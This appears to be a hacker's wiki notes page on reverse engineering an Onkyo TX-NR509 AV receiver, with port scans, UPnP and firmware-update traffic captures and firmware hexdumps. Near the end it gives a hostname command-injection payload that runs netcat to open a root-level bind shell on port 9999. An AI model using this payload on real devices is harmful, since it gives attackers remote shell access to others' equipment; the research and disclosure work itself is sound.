hacker

turmio

Onkyo TX-NR509

This is page for my notes for hacking Onkyo Tx-NR509. Everything is dumped mainly to my own use. Watch http://www.happyhacking.org/ for more formal text.

Services

$ nmap -A -sT -p 1-65535 10.0.2.137

Starting Nmap 5.21 ( http://nmap.org ) at 2011-09-06 18:08 EEST
Strange error from connect (65):No route to host
Nmap scan report for 10.0.2.137
Host is up (0.015s latency).
Not shown: 59802 filtered ports, 5731 closed ports
PORT     STATE SERVICE         VERSION
80/tcp   open  http?
8888/tcp open  sun-answerbook?
60128/tcp open  unknown
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Web-server

Basic information

=== Skipfish findings ===

$ curl -v "http://10.0.2.137/station.cgi?page=294967999"
* About to connect() to 10.0.2.137 port 80 (#0)
*   Trying 10.0.2.137... connected
* Connected to 10.0.2.137 (10.0.2.137) port 80 (#0)
> GET /station.cgi?page=294967999 HTTP/1.1
> User-Agent: curl/7.21.2 (x86_64-unknown-openbsd4.9) libcurl/7.21.2 OpenSSL/1.0.0a zlib/1.2.3 libidn/1.19
> Host: 10.0.2.137
> Accept: */*
> 
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Content-type: text/html
< 
* Closing connection #0

Serialport socket

Serial port and J-TAG

NET/ USB section (This seems to be valid)

USB-interface

UPnP support

$sudo tcpdump  -i en1 -s 65535 -A host 10.0.2.137
18:34:30.134432 IP 10.0.2.137.ssdp > 239.255.255.250.ssdp: UDP, length 345
E..u..@...z.
........l.l.a.dNOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
CACHE-CONTROL: max-age=1801
LOCATION: http://10.0.2.137:8888/upnp_descriptor_0
NT: urn:schemas-upnp-org:service:AVTransport:1
NTS: ssdp:alive
SERVER: Linux/2.6.33-rc4 UPnP/1.0 MediabolicUPnP/1.8.225
USN: uuid:65b0dc02-c3dc-02b9-14d5-0209c3b9ca73::urn:schemas-upnp-org:service:AVTransport:1

Server header:

< HTTP/1.1 200 OK
< Content-type: text/xml; charset=utf-8
< Content-length: 3297
< Server: MediabolicMWEB/1.8.225
< Connection: keep-alive
< 
* Connection #0 to host 10.0.2.137 left intact
* Closing connection #0

$ lynx --dump "http://10.0.2.137:8888/upnp_descriptor_0"

   10urn:schemas-upnp-org:device:MediaRenderer:1TX-NR509 test
   AAAONKYOhttp://www.onkyo.comAV
   ReceiverTX-NR509TX-NR509http://www.onkyo.comuuid:65b0dc02-c3dc-02b9-14d
   5-0209c3b9ca73urn:schemas-upnp-org:service:RenderingControl:1urn:upnp-o
   rg:serviceId:RenderingControl/upnp_control_0/upnp_event_0/scpd/Renderin
   gControl_1urn:schemas-upnp-org:service:ConnectionManager:1urn:upnp-org:
   serviceId:ConnectionManager/upnp_control_1/upnp_event_1/scpd/Connection
   Manager_1urn:schemas-upnp-org:service:AVTransport:1urn:upnp-org:service
   Id:AVTransport/upnp_control_2/upnp_event_2/scpd/AVTransport_1http://10.
   0.2.137/VEN_1666&DEV_1100&REV_01
   VEN_0033&DEV_000C&REV_01DMR-1.50Multimedia.DMRMS_DigitalMediaDeviceClas
   s_DMR_V001image/jpeg12012024http://10.0.2.137/icon/onkyo_low_120.jpgima
   ge/jpeg484824http://10.0.2.137/icon/onkyo_low_048.jpgimage/jpeg323224ht
   tp://10.0.2.137/icon/onkyo_low_032.jpgimage/png12012024http://10.0.2.13
   7/icon/onkyo_low_120.pngimage/png484824http://10.0.2.137/icon/onkyo_low
   _048.pngimage/png323224http://10.0.2.137/icon/onkyo_low_032.pngMediaDev
   ices01

AMP fetches data from the server

GET /upnphost/udhisapi.dll?content=uuid:8178c854-4d03-42c8-8195-24fba0cb8abf HTTP/1.1
Host: 10.0.2.18:2869
User-Agent: Mediabolic-IMHTTP/1.8.225 UPNP/1.0 DLNADOC/1.50


14:25:09.292366 IP 10.0.2.137.43029 > 10.0.2.18.2869: Flags [P.], seq 1:173, ack 1, win 2920, options [nop,nop,TS val 328932421 ecr 11972172], length 172
E.....@.@...
...
......5jV..."B....h.g.....
...E...LGET /upnphost/udhisapi.dll?content=uuid:8178c854-4d03-42c8-8195-24fba0cb8abf HTTP/1.1
Host: 10.0.2.18:2869
User-Agent: Mediabolic-IMHTTP/1.8.225 UPNP/1.0 DLNADOC/1.50


14:25:12.721323 IP 10.0.2.137.43030 > 10.0.2.18.2869: Flags [P.], seq 1:173, ack 1, win 2920, options [nop,nop,TS val 328932764 ecr 11972515], length 172
@.@..p
...
......5n.T}.......h.......
........GET /upnphost/udhisapi.dll?content=uuid:8178c854-4d03-42c8-8195-24fba0cb8abf HTTP/1.1
Host: 10.0.2.18:2869
User-Agent: Mediabolic-IMHTTP/1.8.225 UPNP/1.0 DLNADOC/1.50

Firmware update over network

10.0.2.137:50127 -> 10.0.0.1:53
  .............avrupd.onkyo.com.....                                         
#
U 10.0.0.1:53 -> 10.0.2.137:50127
  .............avrupd.onkyo.com.....¿.......Q....updsrv¿.¿.......Q...“..L¿...
  ....5Ï...ns1.onkyo.co.jp.¿.......5Ï...ns1.omp.ne¿`¿S......5Ï..“«™N¿p......5
  Ï..“.."                                                                    
####
T 10.0.2.137:51273 -> 210.134.145.76:80 [AP]
  POST /release/cgi/download.cgi HTTP/1.1..Host: avrupd.onkyo.com..Accept: */
  *..User-Agent: AVR/1.0..Content-Type: application/x-www-form-urlencoded..Co
  ntent-Length: 69....hwaddr=00:09:b0:c1:d5:c3&filename=AVR0007/ONKAVR0007_00
  NA00EA00NA.of1                                                             
#
T 210.134.145.76:80 -> 10.0.2.137:51273 [AP]
  HTTP/1.1 200 OK..Server: Apache..Status: 200 OK..Date: Sun, 04 Sep 2011 20:
  09:21 GMT..Content-length: 256..Content-Type: application/octet-stream.....
  BÀW/¡∂.zË;∏∆¸ Ã≠i.I.?2..Æ~,≤¸aœsË.|O..v.J.sN©.P.U∆¬B>….ÔF.ÚË<Dp¨†8.€Á•¥w3.
  BˇW...™LU˝g⁄˙._9 ˛.[ÿ‚@ÿ.B…µ.˙.›◊'J≈.d1p%l..p.ÌØo◊Z...nˇ1fi..?·BR(§Xˆ.R ..J
  ⁄ÿ„Cfl)a.3.Ù≥”∂≥.G.mD.u.L..mÈ.U‹5√ÒÚ+y$ƒ‚/n˜ˆ..qM™.]ÌX...cÍ..uU∫º.nY...u.O.≠
  .).W·@⁄ PÁÛ.±ΩÊ›.(..c1r+z'ÀÒN¨                                             
#####

Reverse engineering firmware

$ ls -la
total 22856
drwx------@  5 turmio  staff       170 Sep  6 18:43 .
drwx------+ 26 turmio  staff       884 Sep  6 18:42 ..
-rw-rw-rw-@  1 turmio  staff       256 Aug  4 20:22 ONKAVR0007_00NA00EA00NA.of1
-rw-rw-rw-@  1 turmio  staff    482048 Aug  4 20:22 ONKAVR0007_00NA00EA00NA.of2
-rw-rw-rw-@  1 turmio  staff  11211520 Aug  4 20:24 ONKAVR0007_00NA00EA00NA.of3

For some reason all 3 files starts with this:

ONKAVR0007_00NA00EA00NA_107$ hexdump -C ONKAVR0007_00NA00EA00NA.of1
00000000  95 42 cb 57 2f c1 b6 0f  7a e8 3b b8 c6 fc ca cc  |.B.W/...z.;.....|
00000010  ad 69 14 49 9a 3f 32 2e  05 ae 7e 2c b2 fc 61 cf  |.i.I.?2...~,..a.|
00000020  73 e8 01 7c 4f 06 19 76  0d 4a 0e 73 4e a9 97 50  |s..|O..v.J.sN..P|
00000030  9f 55 c6 c2 42 3e c9 13  f0 ef 46 0f f2 e8 3c 44  |.U..B>....F...<D|
00000040  70 ac a0 38 02 db e7 a5  b4 77 33 88 42 ff 57 17  |p..8.....w3.B.W.|
00000050  0d 8d aa 4c 55 fd 67 da  fa 17 5f 39 ca fe 0b 5b  |...LU.g..._9...[|
00000060  d8 e2 40 d8 1a 42 c9 b5  9e fa 80 dd d7 27 4a c5  |..@..B.......'J.|
00000070  06 64 31 70 25 6c 09 8d  70 0a ed af 6f d7 5a 0c  |.d1p%l..p...o.Z.|
00000080  82 14 6e ff 31 de 16 96  3f f0 e1 42 52 28 a4 58  |..n.1...?..BR(.X|
00000090  f6 10 52 20 99 9d 4a da  d8 e3 43 df 29 61 08 33  |..R ..J...C.)a.3|
000000a0  88 f4 b3 d3 b6 b3 8a 47  0a 6d 44 97 75 0d 4c 14  |.......G.mD.u.L.|
000000b0  81 6d e9 19 55 dc 35 c3  f1 f2 2b 79 24 c4 e2 2f  |.m..U.5...+y$../|
000000c0  6e f7 f6 07 8b 71 4d aa  9c 5d ed 58 0a 7f 0e 63  |n....qM..].X...c|
000000d0  ea 08 8d 75 55 ba bc 9d  6e 59 0c 83 17 75 0e 4f  |...uU...nY...u.O|
000000e0  0f ad 82 29 99 57 e1 40  da 20 50 e7 f3 1a b1 bd  |...).W.@. P.....|
000000f0  e6 dd 02 28 83 84 63 31  72 2b 7a 27 cb f1 4e ac  |...(..c1r+z'..N.|
00000100

Backdooring the amp

You can set up backdoor to your AMP with setting hostname from WEB-management to: nc -l -l -p 9999 -e /bin/ash & and rebooting the amp using the power switch.

After reboot you can take telnet / nc -connection to port 9999 and you should have shell access.

This bug is reported to Onkyo a long time ago so it might be fixed in newer versions.

Attachments

  • [get | view | diff] (2012-01-18 22:54:15, 2170.7 KB) [[attachment:IMG_2403.JPG]]
  • [get | view | diff] (2012-01-18 22:54:06, 2823.3 KB) [[attachment:IMG_2405.JPG]]
  • [get | view | diff] (2011-09-08 19:54:21, 89.4 KB) [[attachment:configpage.png]]
  • [get | view | diff] (2011-09-06 15:16:09, 108.8 KB) [[attachment:customer.png]]
  • [get | view | diff] (2011-09-06 15:15:13, 111.5 KB) [[attachment:info.png]]
  • [get | view | diff] (2012-01-16 08:18:45, 86.6 KB) [[attachment:jtag-rs232.png]]
  • [get | view | diff] (2012-08-07 16:34:59, 70.2 KB) [[attachment:libupdater.so.symbols]]
  • [get | view | diff] (2012-12-08 19:38:39, 1424.0 KB) [[attachment:mtdblcok11-etc]]
  • [get | view | diff] (2011-09-06 15:15:50, 88.8 KB) [[attachment:network.png]]
  • [get | view | diff] (2011-09-13 21:03:49, 256.5 KB) [[attachment:onkyo.xls]]
  • [get | view | diff] (2012-01-16 07:53:49, 7805.3 KB) [[attachment:onkyo_repair-tips_[ET].pdf]]
  • [get | view | diff] (2012-01-16 07:54:08, 1639.6 KB) [[attachment:onkyo_tx-nr1000-service_tips-av-receiver_[ET].pdf]]
  • [get | view | diff] (2012-01-16 07:53:28, 10471.0 KB) [[attachment:onkyo_tx-nr509_[ET].pdf]]
  • [get | view | diff] (2012-12-08 16:35:34, 9728.0 KB) [[attachment:squashfs-mtdblock10]]
  • [get | view | diff] (2011-09-06 15:15:31, 129.7 KB) [[attachment:station.png]]
  • [get | view | diff] (2011-09-06 15:59:40, 88.2 KB) [[attachment:strange.png]]
  • [get | view | diff] (2011-09-06 15:30:03, 2.9 KB) [[attachment:tOnkyo.py]]
  • [get | view | diff] (2012-01-16 10:06:38, 46.6 KB) [[attachment:uart-rs232-net.png]]
 All files | Selected Files: delete move to page copy to page
Normal Sort Sort + uniq Sort + uniq + count
description
Getting shell from Onkyos AVR with network capabilities
started
2011-09-06


CategoryProjekti